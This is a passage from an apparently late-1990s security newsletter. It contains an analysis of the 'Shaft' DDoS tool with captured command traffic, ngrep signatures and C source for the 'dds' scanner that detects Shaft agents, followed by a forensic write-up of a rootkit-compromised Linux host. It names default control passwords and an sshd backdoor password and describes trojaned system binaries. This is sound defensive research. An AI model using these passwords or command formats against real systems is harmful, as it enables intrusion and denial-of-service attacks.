occurs in bursts of 100 packets per host, with the source port and source address randomized. This number is hard-coded, but it is believed that more flexibility can be added. Whereas the source port spoofing only works if the agent is running as a root privileged process, the author has added provisions for packet flooding using the UDP protocol and with the correct source address in the case the process is running as a simple user process. It is noteworthy that the random function is not properly seeded, which may lead to predictable source port sequences and source host IP sequences. Source port = (rand() % (65535-1024)+1024) where % is the mathematical 'mod' operator This will generate source ports greater than 1024 at all times. Source IP = rand()%255.rand()%255.rand()%255.rand()%255 The source IP numbers can (and will) contain a zero in the leading octet. Additionally, the sequence number for all TCP packets is fixed, namely 0x28374839, which helps with respect to detection at the network level. The ACK and URGENT flags are randomly set, except on some platforms. Destination ports for TCP and UDP packet floods are randomized. The client must choose the duration ("time"), size of packets, and type of packet flooding directed at the victim hosts. Each set of hosts has its own duration, which gets divided evenly across all hosts. This is unlike TFN [2] which forks an individual process for each victim host. For the type, the client can select UDP, TCP SYN, ICMP packet flooding, or the combination of all three. Even though there is potential of having a different type and packet size for each set of victim hosts, this feature is not exploited in this version. The author of "Shaft" seems to have a particular interest in statistics, namely packet generation rates of its individual agents. The statistics on packet generation rates are possibly used to determine the "yield" of the DDoS network as a whole. This would allow the attacker to stop adding hosts to the attack network when it reached the necessary size to overwhelm the victim network, and to know when it is necessary to add more agents to compensate for loss of agents due to attrition during an attack (as the agent systems are identified and taken off-line.) Currently, the ability to switch host IP and port for the handler exists, but the listening port for the agent remains the same. It is foreseeable that this will change in the future. -- 3.5.2 A sample attack In this section we will look at a practical example of an attack carried out with the "Shaft" distributed denial of service attack tool, as seen from the attacking network perspective. The shaftnode agent when in use, as seen by "lsof" [10]: # lsof -c shaftnode COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME shaftnode 13489 root cwd VDIR 0,0 400 2 /tmp shaftnode 13489 root txt VREG 0,0 19492 10 /tmp (swap) shaftnode 13489 root txt VREG 32,0 662764 182321 /usr/lib/libc.so.1 shaftnode 13489 root txt VREG 32,0 17480 210757 /usr/platform/sun4u/lib/libc_psr.so.1 shaftnode 13489 root txt VREG 32,0 566700 182335 /usr/lib/libnsl.so.1 shaftnode 13489 root txt VREG 32,0 39932 182348 /usr/lib/libw.so.1 shaftnode 13489 root txt VREG 32,0 15720 182334 /usr/lib/libmp.so.1 shaftnode 13489 root txt VREG 32,0 15720 182327 /usr/lib/libintl.so.1 shaftnode 13489 root txt VREG 32,0 68780 182342 /usr/lib/libsocket.so.1 shaftnode 13489 root txt VREG 32,0 2564 182324 /usr/lib/libdl.so.1 shaftnode 13489 root txt VREG 32,0 137160 182315 /usr/lib/ld.so.1 shaftnode 13489 root 0u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT) shaftnode 13489 root 1u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT) shaftnode 13489 root 2u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT) shaftnode 13489 root 3u inet 0x5032c7d8 0t0 UDP *:18753 (Idle) As one can see, the agent is waiting to receive commands on its default UDP port number 18753. The TCP connection back to the handler remains unexplained to date. Packet flows: Date Time Protocol Source IP/Port Flow Destination IP/Port Sun 11/28 21:39:22 tcp 129.22.64.17.53982 <-> x.x.x.x.21 Sun 11/28 21:39:56 udp x.x.x.x.33198 -> 129.22.64.17.20433 Sun 11/28 21:45:20 udp 129.22.64.17.1765 -> x.x.x.x.18753 Sun 11/28 21:45:20 udp x.x.x.x.33199 -> 129.22.64.17.20433 Sun 11/28 21:45:59 udp 129.22.64.17.1866 -> x.x.x.x.18753 Sun 11/28 21:45:59 udp x.x.x.x.33200 -> 129.22.64.17.20433 Sun 11/28 21:45:59 udp 129.22.64.17.1968 -> x.x.x.x.18753 Sun 11/28 21:45:59 udp 129.22.64.17.1046 -> x.x.x.x.18753 Sun 11/28 21:45:59 udp 129.22.64.17.1147 -> x.x.x.x.18753 Sun 11/28 21:45:59 udp 129.22.64.17.1248 -> x.x.x.x.18753 Sun 11/28 21:45:59 udp 129.22.64.17.1451 -> x.x.x.x.18753 Sun 11/28 21:46:00 udp x.x.x.x.33201 -> 129.22.64.17.20433 Sun 11/28 21:46:00 udp x.x.x.x.33202 -> 129.22.64.17.20433 Sun 11/28 21:46:01 udp x.x.x.x.33203 -> 129.22.64.17.20433 Sun 11/28 21:48:37 udp 129.22.64.17.1037 -> x.x.x.x.18753 Sun 11/28 21:48:37 udp 129.22.64.17.1239 -> x.x.x.x.18753 Sun 11/28 21:48:37 udp 129.22.64.17.1340 -> x.x.x.x.18753 Sun 11/28 21:48:37 udp 129.22.64.17.1442 -> x.x.x.x.18753 Sun 11/28 21:48:38 udp x.x.x.x.33204 -> 129.22.64.17.20433 Sun 11/28 21:48:38 udp x.x.x.x.33205 -> 129.22.64.17.20433 Sun 11/28 21:48:38 udp x.x.x.x.33206 -> 129.22.64.17.20433 Sun 11/28 21:48:56 udp 129.22.64.17.1644 -> x.x.x.x.18753 Sun 11/28 21:48:56 udp x.x.x.x.33207 -> 129.22.64.17.20433 Sun 11/28 21:49:59 udp x.x.x.x.33208 -> 129.22.64.17.20433 Sun 11/28 21:50:00 udp x.x.x.x.33209 -> 129.22.64.17.20433 Sun 11/28 21:50:14 udp 129.22.64.17.1747 -> x.x.x.x.18753 Sun 11/28 21:50:14 udp x.x.x.x.33210 -> 129.22.64.17.20433 There is quite some activity between the handler and the agent, as they go through the command request and acknowledgement phases. There was also what appeared to be testing of the impact on the local network itself with ICMP packet flooding, for which we omit the data here due to size limitations. Let us look at the individual phases from a later attack. Setup and configuration phase: date time src dest dest-port command 4 Dec 1999 18:06:40 129.22.64.17 x.x.x.x 18753 alive tijgu hi 5 8170 4 Dec 1999 18:09:14 129.22.64.17 x.x.x.x 18753 time tijgu 700 5 6437 4 Dec 1999 18:09:14 x.x.x.x 129.22.64.17 20433 time tijgu 5 6437 700 4 Dec 1999 18:09:16 129.22.64.17 x.x.x.x 18753 size tijgu 4096 5 8717 4 Dec 1999 18:09:16 x.x.x.x 129.22.64.17 20433 size tijgu 5 8717 4096 4 Dec 1999 18:09:23 129.22.64.17 x.x.x.x 18753 type tijgu 2 5 9003 The handler issues an "alive" command, and says "hi" to its agent, assigning a socket number of "5" and a ticket number of 8170. We will see that this "socket number" will persist throughout this attack. A time period of 700 seconds is assigned to the agent, which is acknowledged. A packet size of 4096 bytes is specified, which is again confirmed. The last line indicates the type of attack, in this case "the works", i.e. UDP, TCP SYN and ICMP packet flooding combined. Failure to specify the type would make the agent default to UDP packet flooding. Now the list of hosts to attack and which ones they want statistics from on completion: date time src dest dest-port command 4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 207.229.143.6 5 5256 4 Dec 1999 18:09:24 x.x.x.x 129.22.64.17 20433 owning tijgu 5 5256 207.229.143.6 4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 pktres tijgu 207.229.143.6 5 1993 4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 24.7.231.128 5 78 4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 pktres tijgu 24.218.58.101 5 8845 4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 18.85.13.107 5 6247 4 Dec 1999 18:09:25 129.22.64.17 x.x.x.x 18753 own tijgu 24.218.52.44 5 4190 4 Dec 1999 18:09:25 129.22.64.17 x.x.x.x 18753 own tijgu 207.175.72.15 5 2376 4 Dec 1999 18:09:25 x.x.x.x 129.22.64.17 20433 owning tijgu 5 78 24.7.231.128 4 Dec 1999 18:09:26 x.x.x.x 129.22.64.17 20433 owning tijgu 5 6247 18.85.13.107 4 Dec 1999 18:09:27 x.x.x.x 129.22.64.17 20433 owning tijgu 5 4190 24.218.52.44 4 Dec 1999 18:09:28 x.x.x.x 129.22.64.17 20433 owning tijgu 5 2376 207.175.72.15 4 Dec 1999 18:21:04 x.x.x.x 129.22.64.17 20433 pktres rghes 5 1993 51600 4 Dec 1999 18:21:04 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400 4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51500 4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400 4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400 Now that all other parameters are set, the handler issues several "own" commands, in effect specifying the victim hosts. Those commands are acknowledged by the agent with an "owning" reply. The flooding occurs as soon as the first victim host gets added. The handler also requests packet statistics from the agents for certain victim hosts (e.g. "pktres tijgu 207.229.143.6 5 1993"). Note that the reply comes back with the same identifiers ("5 1993") at the end of the 700 second packet flood, indicating that 51600 sets of packets were sent. One should realize that, if successful, this means 51600 x 3 packets due to the configuration of all three (UDP, TCP, and ICMP) types of packets. In turn, this results in roughly 220 4096 byte packets per second per host, or about 900 kilobytes per second per victim host from this agent alone, about 4.5 megabytes per second total for this little exercise. Note the reverse shift ("shift" becomes "rghes", rather than "tijgu") for the password on the packet statistics. -- 3.5.3 Detection at the network level Scanning the network for open port 20432 will reveal the presence of a handler on your LAN. For detecting idle agents, one could write a program similar to George Weaver's trinoo detector. Sending out "alive" messages with the default password to all nodes on a network on the default UDP port 18753 will generate traffic back to the detector, making the agent believe the detector is a handler. This program does not provide for code updates (like TFN or Stacheldraht). This may imply "rcp" or "ftp" connections during the initial intrusion phase (see also [5]). The program uses UDP traffic for its communication between the handlers and the agents. Considering that the traffic is not encrypted, it can easily be detected based on certain keywords. Performing an "ngrep" [11] for the keywords mentioned in the syntax sections (3.3.1 and 3.3.2), will locate the control traffic, and looking for TCP packets with sequence numbers of 0x28374839 may locate the TCP SYN packet flood traffic. Source ports are always above 1024, and source IP numbers can include zeroes in the leading octet. Strings in this control traffic can be detected with the "ngrep" program using the same technique shown in [5], [6], and [7]. For example, # ngrep -i -x "alive tijgu" udp # ngrep -i -x "pktres|pktstat" udp will locate the control traffic between the handler and the agent, independently of the port number used. There are also two excellent scanners for detecting DDoS agents on the network: Dittrich's "dds" [8] and Brumley's "rid" [2]. "dds" was written to provide a more portable and less dependant means of scanning for various DDoS tools. (Many people encountered problems with Perl and the Net::RawIP library [15] on their systems, which prevented them from using the scripts provided in [5], [6], and [7].) Due to time contraints during coding, "dds" does not have the flexibility necessary to specify arbitrary protocols, ports, and payloads. A modified version of "dds", geared towards detecting only "Shaft" agents, is included in the Appendix. A better means of detecting "Shaft" handlers and agents would be to use a program like "rid", which uses a more flexible configuration file mechanism to define ports, protocols, and payloads. A sample configuration for "rid" to detect the "Shaft" control traffic as described: start shaft send udp dport=18753 data="alive tijgu hi 5 1918" recv udp sport=20433 data="alive" nmatch=1 end shaft -- 3.6 Defenses --------------- To protect against the effects of the multiple types of denial of service, we suggest that you review the other papers (see [1, 3, 5, 6, 7]) and other methods of dealing with DDoS attacks being discussed and promoted (see [9]). For example, rate-limiting is considered effective against ICMP packet flooding attacks, while anti-spoof filters and egress filters at the border routers can limit the problems caused by attacking agents faking source addresses. -- 4. Further evolution ----------------------- While the author(s) of this tool did not pursue the use of encryption of its control traffic, such an evolution is conceivable, since a Caesar cipher is used to obfuscate the password. A transition to Blowfish or other stream ciphers is realistic, and changing the communication protocol to ICMP, much like TFN, is conceivable. The use of multicast protocols for both communication or packet flooding is also possible. To date, no source for the "Shaft" handler ("shaftmaster") has been obtained of analyzed. At this stage, the code is believed to be private. This would mean that the authors could likely change defaults and the probability of detecting "script kiddie" copycats using default values as analyzed here is low. This would argue for rapid and widespread detection efforts to identify agents before this change. -- 5. Conclusion ---------------- "Shaft" is another DDoS variant with independent origins. The code recovered did appear to be still in development. Several key features indicate evolutionary trends as the genre develops. Of significance is the priority placed on packet generation statistics which would allow host selection to be refined. The analysis of the code and binary was greatly enhanced by the capture of attack preparation and command packets. The captured packets made it possible to assess the impact of a single agent that managed to saturate the network pipe. The version analyzed had hooks which would allow for dynamic changes to the master host and control port but not the agent control port. However such items are trivially incorporated and must not be taken to be indicative of any current versions which may be in active use. The obfuscation of master IP, ports and passwords used a relatively simple form of encryption but this could easily be strengthened. The detection of DDoS installations will become very much more difficult as such metamorphosis techniques progress, the presence of such agents will still be more readily determined by analysis of traffic anomalies with a consequent pressure on time and resources for site administrators and security teams. -- APPENDIX A: References ------------------------- [1] Barlow, Jason and Woody Thrower. TFN2K An Analysis http://www2.axent.com/swat/News/TFN2k_Analysis.htm [2] Brumley, David. Remote Intrusion Detector. http://theorygroup.com/Software/RID [3] CERT Distributed System Intruder Tools Workshop report http://www.cert.org/reports/dsit_workshop.pdf [4] CERT Advisory CA-99-17 Denial-of-Service Tools http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html [5] Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool http://staff.washington.edu/dittrich/misc/trinoo.analysis [6] Dittrich, David. The "Tribe Flood Network" distributed denial of service attack tool http://staff.washington.edu/dittrich/misc/tfn.analysis [7] Dittrich, David. The "Stacheldraht" distributed denial of service attack tool http://staff.washington.edu/dittrich/misc/stacheldraht.analysis [8] Dittrich, David, Marcus Ranum, George Weaver, David Brumley et al. http://staff.washington.edu/dittrich/dds [9] Dittrich, David, Distributed Denial of Service (DDoS) Attacks/Tools http://staff.washington.edu/dittrich/misc/ddos/ [10] lsof: http://vic.cc.purdue.edu/ [11] ngrep: http://www.packetfactory.net/ngrep/ [12] Packet Storm Security, Distributed denial of service attack tools http://packetstorm.securify.com/distributed/ [13] Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ] http://www.phrack.com/search.phtml?view&article=p49-6 [14] Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17 [ L O K I 2 (the implementation) ] http://www.phrack.com/search.phtml?view&article=p51-6 [15] Net::RawIP: http://quake.skif.net/RawIP [16] tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z [17] Schneier, Bruce. Applied Cryptography, 2nd edition, Wiley. [18] Stevens, W. Richard and Gary R. Wright. TCP/IP Illustrated, Vol. I, II, and III., Addison-Wesley. [19] Zuckerman, M.J. Net hackers develop destructive new tools. USA Today, 7 December 1999. http://www.usatoday.com/life/cyber/tech/review/crg681.htm -- APPENDIX B: dds ("Shaft" only variant) /* * dds $Revision: 1.6s $ - a distributed DoS tool scanner - Shaft only * * Based on the gag scanner, written by David Dittrich, University * of Washington, Marcus Ranum, Network Flight Recorder, with * code contributed by others, and based on an idea stolen from * George Weaver, Pennsylvania State University. * * Dave Dittrich * Marcus Ranum * George Weaver * David Brumley */ /* Shaft only version, modified to that effect by * Sven Dietrich */ #if YOU_HAVE_NOT_READ_THIS_YET This software should only be used in compliance with all applicable laws and the policies and preferences of the owners of any networks, systems, or hosts scanned with the software The developers and licensors of the software provide the software on an "as is" basis, excluding all express or implied warranties, and will not be liable for any damages arising out of or relating to use of the software. THIS SOFTWARE IS MADE AVAILABLE "AS IS", AND THE UNIVERSITY OF WASHINGTON DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, WITH REGARD TO THIS SOFTWARE, INCLUDING WITHOUT LIMITATION ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND IN NO EVENT SHALL THE UNIVERSITY OF WASHINGTON BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, TORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. #endif #define VERSION "$Revision: 1.6s $" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define BS 1024 #define __FAVOR_BSD /* The two arrays below are for address range calculations. They should have been automatically generated, but 1) I am lazy. 2) There are a few special cases in them. I will not scan more than a /16. When we do scan a CIDR block, we assume that it actually is a CIDR block, and do not scan the network or broadcast address. */ static unsigned long MaskBits[] = { 0x00000000, /* /0 */ 0x00000000, /* /1 */ 0x00000000, /* /2 */ 0x00000000, /* /3 */ 0x00000000, /* /4 */ 0x00000000, /* /5 */ 0x00000000, /* /6 */ 0x00000000, /* /7 */ 0x00000000, /* /8 */ 0x00000000, /* /9 */ 0x00000000, /* /10 */ 0x00000000, /* /11 */ 0x00000000, /* /12 */ 0x00000000, /* /13 */ 0x00000000, /* /14 */ 0x00000000, /* /15 */ 0xffff0000, /* /16, Class B */ 0xffff8000, /* /17, 128 * Class C */ 0xffffc000, /* /18, 64 * Class C */ 0xffffe000, /* /19, 32 * Class C */ 0xfffff000, /* /20, 16 * Class C */ 0xfffff800, /* /21, 8 * Class C */ 0xfffffc00, /* /22, 4 * Class C */ 0xfffffe00, /* /23, 2* Class C */ 0xffffff00, /* /24, Class C */ 0xffffff80, /* /25, 128 hosts */ 0xffffffc0, /* /26, 64 hosts */ 0xffffffe0, /* /27, 32 hosts */ 0xfffffff0, /* /28, 16 hosts */ 0xfffffff8, /* /29, 8 hosts */ 0xfffffffc, /* /30, 4 hosts (PPP link) */ 0xfffffffe, /* /31, invalid */ 0xffffffff, /* /32, host */ }; static int NumHosts[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* don't scan more than a /16 */ 65534, /* These are all -2 so that we don't scan the broadcast addr or the network addr */ 32766, 16382, 8190, 4094, 2046, 1022, 510, 254, 126, 62, 30, 14, 6, 2, 0, 1, }; extern char *optarg; struct udppkt_t { struct ip ipi; struct udphdr udpi; char buffer[BS]; } udppkt; static void listener(); static int usage(); static int vflg = 0; /* verbosity */ static int dflg = 0; /* debugging */ /* shaft variables */ static short shaft_dstport = 18753; /* handler listen port */ static short shaft_rctport = 20433; /* agent listen port */ char shaft_scmd[] = "alive"; char shaft_spass[] = "tijgu"; char shaft_echostr[] = "alive"; int main(int argc, char **argv) { int pid, host; char target[128]; unsigned long target_host; struct in_addr target_ip; int mask; char * mask_ptr; int result; int usock; char buf[BS]; struct sockaddr_in usa; int i; char *jnk1; char *jnk2; int sleepytime = 500; int bigsleep = 30; int num_hosts; char scmd[BS], spass[BS], sbuf[BS]; while((i = getopt(argc,argv,"ds:S:v")) != -1) { switch(i) { case 'd': dflg++; break; case 's': sleepytime = atoi(optarg); if(sleepytime <= 0) { fprintf(stderr,"WARNING: zero interping sleep time will probably overflow your sy stem's transmit buffers and yield poor results\n"); sleepytime = 1; } break; case 'S': bigsleep = atoi(optarg); if(bigsleep <= 0) { fprintf(stderr,"WARNING: negative sleep value - staying with default of %d\n", bi gsleep); } break; case 'v': vflg++; break; default: exit(usage()); } } if(optind >= argc || argc - optind > 1) exit(usage()); mask_ptr = strchr(argv[optind], '/'); /* if a CIDR block is passed in */ if (mask_ptr) { *mask_ptr = '\0'; mask_ptr ++; sscanf(mask_ptr, "%d", &mask); } else { printf("No mask passed, assuming host scan (/32)\n"); mask = 32; } result = inet_aton(argv[optind], &target_ip); if (result == 0) { fprintf(stderr, "%s: Bad IP address: %s\n", argv[0], argv[optind]); exit(-1); } if (mask < 16) { fprintf(stderr, "Bad Network Admin! Bad! Do not scan more than a /16 at once!\n"); exit(-1); } num_hosts = NumHosts[mask]; if (num_hosts == 0) { fprintf(stderr, "Cannot scan a /%d. Exiting...\n", mask); exit(-1); } if(vflg) { printf("Mask: %d\n", mask); printf("Target: %s\n", inet_ntoa(target_ip)); printf("dds %s - scanning...\n\n", VERSION); } sprintf(sbuf,"%s %s hi 5 1918",shaft_scmd,shaft_spass); target_host = ntohl(target_ip.s_addr); target_host &= MaskBits[mask]; target_ip.s_addr = htonl(target_host); if((pid = fork()) < 0) { perror("cannot fork"); exit(1); } /* child side listens for return packets */ if (pid == 0) listener(); sleep(1); /* main sweep loop - COULD be expanded to whole Internet but... */ /* but that would be _very_ bad.... */ while (num_hosts) { if (mask != 32) { target_host ++; } target_ip.s_addr = htonl(target_host); num_hosts--; /* we really need to skip the network and broadcast addresses */ if ((target_host & 0xff) == 0 || (target_host & 0xff) == 0xff) { if(vflg) printf("Skipping special address %s\n", inet_ntoa(target_ip)); continue; } if(vflg) printf("Probing address %s\n", inet_ntoa(target_ip)); /* shaft check */ bzero((char *) &usa, sizeof(usa)); usa.sin_family = AF_INET; usa.sin_addr.s_addr = target_ip.s_addr; usa.sin_port = htons(shaft_dstport); if (dflg) fprintf(stderr,"Sending UDP to: %s\n", inet_ntoa(usa.sin_addr)); if ((usock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("cannot open UDP socket"); exit(1); } i = sendto(usock,sbuf,strlen(sbuf), 0, (struct sockaddr *)&usa, sizeof(usa)); if (i < 0) { char ebuf[BS]; sprintf(ebuf,"sendto: udp %s", inet_ntoa(usa.sin_addr)); perror(ebuf); break; } close(usock); usleep(sleepytime); } /* wait for any late responses */ if (dflg) fprintf(stderr,"Waiting %d seconds for late responses.\n", bigsleep); sleep(bigsleep); /* shut listener. if this fails the listener exits on its own */ (void)kill(pid, SIGHUP); exit(0); } static void listener() { int usock; int i, len; fd_set fdset; char buf[BS]; char rcmd[BS], filler[BS], rpass[BS]; struct timeval timi; struct udppkt_t upacket; struct sockaddr_in sa, from; /* child becomes a listener process */ if ((usock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) { perror("cannot open raw UDP listen socket"); exit(1); } bzero((char *) &sa, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = INADDR_ANY; sa.sin_port = htons(shaft_rctport); if (bind(usock, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("cannot bind to socket"); exit(-1); } while (1) { /* if parent has exitted, die */ if(getppid() == 1) exit(0); FD_ZERO(&fdset); FD_SET(usock, &fdset); timi.tv_sec = 1; timi.tv_usec = 0; select(FD_SETSIZE, &fdset, NULL, NULL, &timi); usleep(100); if (FD_ISSET (usock, &fdset)) { /* read data from UDP listen socket */ memset((void *) &upacket, 0, sizeof(struct udppkt_t)); len = sizeof(from); #if 1 if ((i = recvfrom(usock, buf, BS, 0, (struct sockaddr *) &from, &len)) < 0) { perror("recvfrom"); continue; } #else i = read (usock, (char *) buf, BS) - (sizeof (struct ip) + sizeof (struct udphdr)); #endif sa.sin_addr.s_addr = upacket.ipi.ip_src.s_addr; if(dflg) fprintf(stderr, "Listener got a UDP packet on port %s\n", shaft_rctport); /* shaft check */ if (strstr(buf,shaft_echostr)) { printf("Received '%s' from %s", shaft_echostr, inet_ntoa(from.sin_addr)); printf(" - probable shaft agent\n"); } else { printf("Unexpected UDP packet received on port %d from %s\n", shaft_rctport, inet_ntoa(from.sin_addr)); } } } } static int usage() { fprintf(stderr,"usage: dds [options] \n"); fprintf(stderr,"target is CIDR block to scan in form:\n"); fprintf(stderr,"\tA.B.C.D/mask\n"); fprintf(stderr,"Options:\n"); fprintf(stderr,"\t[-v] turns on verbosity\n"); fprintf(stderr,"\t[-d] turns on debugging\n"); fprintf(stderr,"\t[-s] interpacket sleep in microseconds\n"); fprintf(stderr,"\t[-S] delay for late packets\n"); return(1); } --- Dr. Sven Dietrich Raytheon ITSS | spock@sled.gsfc.nasa.gov ESDIS Project, Code 586, Blg 32 Rm N231 | +1-301-614-5119 | 614-5270 Fax NASA Goddard Space Flight Center | Greenbelt, MD 20771, USA @HWA 111.1 Shaft Node/Master analysis by Rick Wash & Jose Nazario ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: PSS --J/dobhs11T7y2rNN Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable ---[ ]--- Analysis of a Shaft Node and Master March 26, 2000 ---[ ]--- Rick Wash rlw6@po.cwru.edu Jose Nazario jose@biocserver.cwru.edu Section 0: Introduction =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D This analysis is in addition to Sven Dietrich's analysis, dated March 16, 2= 000, of the Shaft DDoS tool. The analysis we provide here is a description of t= he rootkit used and the methods of distribution of the tool. We share this=20 information so that other site and system administrators can examine their systems for comprimise and use as Shaft nodes.=20 Note: This file can be found at: http://biocserver.cwru.edu/~jose/shaft_analysis/ The user names and host ID's have been munged. We have tried to contact the domain admins whose networks have appeared anywhere in any of these files. ---------[ How We Found This Information Once we were alerted that our machine may have been compromised, we perform= ed both network and host based scans. A network port scan (using nmap) reveal= ed port 5002/tcp open and listening. Furthermore, it revealed port 22/tcp (ss= h) open, which was not installed by the system administrator. A host based scan revealed similarly that port 5002/tcp was listening. An analysis with rpm -Va revealed differences in sizes and MD5 sums for the components of the root kit, but did not reveal the Shaft toolkit. At this = time the system was taken offline and the disk was mounted in another trusted sy= stem and analyzed from there. =20 Local administrators had noted that the system had become unstable over aut= umn, corresponding to the tests of the Shaft DDoS tool. =20 Section 1: The Rootkit Used =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D ----------------[ What We Found =20 One of the significant things we found while analyzing the box was a direct= ory and set of files that I will call the sda69 toolkit. It was found in /dev (/dev/sda69 and 4 files sda69[a-d]). This appears to be the attackers work= ing directory, so most of their scripts and files are stored there. It appears that much of their older work from when they originally compromi= sed=20 the box was stored in a subdirectory called ". " (dot space, "/dev/sda69/. = "). This directory contained 6 files that compromised a system for sniffing the ethernet network and analyzing the sniffer logs. Here is a list of files a= nd what they do: -rwxr-xr-x 1 0 20 28969 Apr 4 1999 idle This was their sniffer. It was designed to sniff ports 21/tcp and 23/tcp (= ftp=20 and telnet, respectively). It was capture the first x number of bytes of e= ach connection, log them to a file, and move on to the next connection. This w= as used to gather passwords, since both ftp and telnet send passwords over plaintext. This sniffer only logged in one direction (the data flowing from the machine that started the connection to the destination machine). This = was done because the other direction rarely contains useful information. The output file in this case was tcp.log. The program was named idle probably = to fool any sysadmin who noticed it in ps and make them believe it was just id= le time. -rw-r--r-- 1 0 0 456799 Jun 11 1999 tcp.log This was their sniffer log. It contained data in the form: src_ip =3D> dst_ip [port] data =2E.. ----- [method of connection termination] This log only contained information for ports 21 and 23. It did also conta= in a number of passwords. -rwxr-xr-x 1 0 0 2795 May 12 1999 pp.pl This was a perl script that extracted usernames and passwords from their sniffer log files. -rw-r--r-- 1 0 0 6 Apr 28 1999 sniff.pid This is a standard pid lock file for the sniffer.=20 -rw-r--r-- 1 0 20 7654 Apr 4 1999 s A simple SYN flood program. -rwxrwxr-x 1 0 0 7656 Aug 28 1998 chattr This is the standard linux chattr program, linked dynamically against libc6= . =20 This material in ". " shows that the attackers did use this box for sniffing passwords from the ethernet network that it was connected to. It is curren= tly unknown if the attackers did any thing else during this time frame (May-June 1999). --------[ Linux Trojan Horse Programs Found Investigation of the Linux host comprimised yielded the following trojan horse programs. They were found by mounting the disc read-only and without executable permissions set. A full recursive file listing was then=20 performed (ls -lartRi /mnt) which quickly revealed the trojan horse binarie= s: 20563 -rwxrwxr-x 1 root root 437428 Sep 15 1998 vi 20554 -rwxrwxr-x 1 root root 262756 Oct 2 1998 tcsh 313370 -r-xrwxr-x 1 root root 31312 Oct 3 1998 ps Examination of the binaries using strings(1), together with additional files on the system, reveals the method of operation of the new binaries.=20 The file sizes were sometimes larger, most likely due to being statically linked against an older C library (libc5 on a libc6 system). On a running host, examination by using RPM in verify mode (rpm -Va) showed file sizes, permissions and MD5 sums were off when compared to the database on the system.=20 ls The ls trojan we found has the effect of not listing files listed in a=20 hidden configuration file, /dev/sda69c. As such, it's highly extensible.=20 Several utiities were hidden, including elements of the Shaft toolkit and even some terminals. netstat Examination of the replaced netstat binary reveals that it is used to hide connections to or from certain networks and on certain ports. The networks and ports were configured using the file /dev/sda69b, an additional element of the rootkit. ps Again, used to hide activity. The trojan horse ps(1) binary makes a referen= ce to the file /dev/sda69a, which contains a listing of processes and terminals to hide. A fairly typical rootkit listing, including sniffers, scanners, the eggdrop IRC script, and the backdoored sshd. updatedb The program updatedb(1L), normally a link to slocate(1), was replaced with= =20 shell script. Again, used to hide signs of the rootkit tools. locate Similar to updatedb's trojan, used to hide the rootkit and Shaft toolkit. find Again, used to hide the toolkits, calls the file /dev/sda69c in a similar way to the ls trojan to hide files. dir vdir See ls, used in the same fashion. killall Replaced, calls /dev/sda69a, a listing of processes and terminals. Used to prevent the halting of the intruder's processes.=20 syslogd Replaced, calls /dev/sda69d, a list of domains. Presumably it prevents logg= ing when hosts from these domains connect. tcpd The TCP wrappers executable, calls /dev/sda69b and prevents access checking from those networks and on those ports. inetd Appears to be a combined portmapper and inetd daemon, perhaps to allow for access or system control via RPC calls. sshd Trojaned sshd 1.2.26, static linked against libc5. Contains a backdoor password "rOOTkIT" which yeilds a root shell without logging. ifconfig Replaced, with the trojan version omitting any reporting of the PROMISC=20 setting, hiding the use of the sniffing software. -----------[ Solaris SPARC Trojans Found During the course of our investigation into the toolkit, we also found seve= ral key binaries for Solaris as trojan horse programs. Witin the archive (neet.= tar) there is a script plus several binary replacement for the SPARC acrhitectur= e. The script installs an inetd trojan, a ps and update trojan as well. These are then run. Log wiping is also done. System comprimise is presumably through a known exploit. We performed no real analysis on the trojan horse programs for SPARC as we did not examine a Solaris node of the Shaft tool. -rwx------ 1 510 510 39544 Mar 18 1999 doc This appears to be their trojaned SPARC Solaris inetd binary. -rwx------ 1 510 510 24356 Mar 18 1999 ps This appears to be their trojaned SPARC Solaris ps binary. -rwx------ 1 510 510 25548 Mar 18 1999 update Solaris does not use update, though SunOS 4.x did. This is probably to=20 confuse the administrator should they stumble across the 